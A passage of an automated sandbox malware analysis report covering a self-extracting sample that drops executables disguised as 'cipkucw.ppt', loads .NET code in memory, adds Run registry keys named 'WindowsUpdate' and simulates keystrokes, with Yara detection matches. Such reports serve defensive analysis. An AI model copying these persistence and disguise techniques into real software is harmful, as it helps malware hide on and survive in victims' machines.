          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, MbvpxzoYoElhnE.cs | .Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, MbvpxzoYoElhnE.cs | .Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, MbvpxzoYoElhnE.cs | .Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, MbvpxzoYoElhnE.cs | .Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, MbvpxzoYoElhnE.cs | .Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, MbvpxzoYoElhnE.cs | .Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, MbvpxzoYoElhnE.cs | .Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, MbvpxzoYoElhnE.cs | .Net Code: xnzMYjnJtuXB System.AppDomain.Load(byte[])
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_006F5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_006F5D78
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6173281
          Source: yjOJ1YK5M3.exe | Static PE information: section name: .didat
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_00296680 push ecx; ret 0_2_00296693
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_00295773 push ecx; ret 0_2_00295786
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00740332 push edi; ret 6_2_00740333
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00710E06 push ecx; ret 6_2_00710E19
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0070DBFC push cs; iretd 6_2_0070DBFD
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0070DC00 push eax; iretd 6_2_0070DC01
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_01010332 push edi; ret 15_2_01010333
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_00FE0E06 push ecx; ret 15_2_00FE0E19
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_00FDDC00 push eax; iretd 15_2_00FDDC01
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, nEUsGCMtCWeF.cs | High entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, utoIMOcfPuYy.cs | High entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, nEUsGCMtCWeF.cs | High entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, utoIMOcfPuYy.cs | High entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, nEUsGCMtCWeF.cs | High entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, utoIMOcfPuYy.cs | High entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, nEUsGCMtCWeF.cs | High entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, utoIMOcfPuYy.cs | High entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, nEUsGCMtCWeF.cs | High entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, utoIMOcfPuYy.cs | High entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, nEUsGCMtCWeF.cs | High entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, utoIMOcfPuYy.cs | High entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, nEUsGCMtCWeF.cs | High entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, utoIMOcfPuYy.cs | High entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, nEUsGCMtCWeF.cs | High entropy of concatenated method names: 'MkcRCSWyaQ', 'QJrsxPjyHPP', 'aqxJnMSPXGzizqqE', 'BdiZOqLbMQAS', 'fvjMXFzRonmCT', 'HtyOywHBFsudJzv', 'xClNxgMlMfLm', 'aeSEXTiqerkRs', 'xhCRVbSciuMm', 'JDxUVjtXpVIckT'
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, utoIMOcfPuYy.cs | High entropy of concatenated method names: 'OERpoxwXlZYf', 'ddFaDMrhFJfCyvv', 'DbnvmKANtKCZBK', 'TKQelXawMCLja', 'sqKyuhccwsYU', 'QrIYISIdbPF', 'FcfYiHtDofMwv', 'WVjMeBvRagZAQF', 'mqsMnazHHfpS', 'mCSmJupfHPx'

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt.exe
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | File created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe.exe
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | File created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | File created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | File created: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt

          Boot Survival

          Source: Yara match | File source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2800, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_007825A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_007825A0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0070FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_0070FC8A
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_010525A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_010525A0
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_00FDFC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_00FDFC8A
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match File source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Source: Yara match File source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
